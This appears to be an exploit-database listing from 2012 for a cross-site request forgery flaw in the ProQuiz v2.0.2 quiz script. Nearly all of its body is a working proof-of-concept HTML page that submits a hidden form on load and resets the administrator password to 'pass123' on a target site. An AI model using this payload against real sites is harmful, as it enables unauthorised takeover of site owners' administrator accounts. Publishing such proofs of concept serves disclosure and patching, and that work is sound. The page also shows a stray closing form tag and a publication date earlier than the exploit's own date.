[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ProQuiz v2.0.2 CSRF Vulnerability
# Published : 2012-08-16
# Author :
# Previous Title : Social Engine v4.2.5 Multiple Vulnerabilities
# Next Title : OTRS Open Technology Real Services 3.1.4 Stored XSS
##########################################
[~] Exploit Title: ProQuiz v2.0.2 CSRF Vulnerability
[~] Author: DaOne
[~] Date: 19/8/2012
[~] Software Link: http://code.google.com/p/proquiz/downloads/list
##########################################
[#] [ CSRF Change Admin Password ]
</form>
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/functions.php?action=edit_profile&type=password">
<input type="hidden" name="password" value="pass123"/>
<input type="hidden" name="cpassword" value="pass123"/>
</form>
</body>
</html>
##########################################